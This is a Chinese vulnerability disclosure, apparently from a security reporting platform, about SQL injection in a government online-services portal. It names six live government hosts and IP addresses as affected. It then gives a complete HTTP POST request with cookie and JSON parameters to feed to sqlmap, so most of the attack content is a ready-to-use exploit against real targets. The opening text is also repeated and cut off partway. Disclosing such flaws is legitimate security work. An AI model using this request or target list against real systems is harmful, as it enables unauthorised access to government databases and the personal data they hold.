### 简要描述: rt ### 详细说明: 某政府在用系统通用型SQL注入#6。 案例: http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp ### 漏洞证明: 需要一个一个的抓包。 http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp ``` POST参数: POST/outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp x-requested-with: XMLHttpRequest Content-Type: application/json Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;...
### 简要描述: rt ### 详细说明: 某政府在用系统通用型SQL注入#6。 案例: http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp ### 漏洞证明: 需要一个一个的抓包。 http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp ``` POST参数: POST/outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp x-requested-with: XMLHttpRequest Content-Type: application/json Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: wssp.jiangxi.gov.cn:8008 Content-Length: 108 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6 {"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}} ``` 用sqlmap -r 去跑。 [<img src="https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png" alt="QQ图片20150531101614.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png) [<img src="https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png" alt="QQ图片20150531101628.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png)
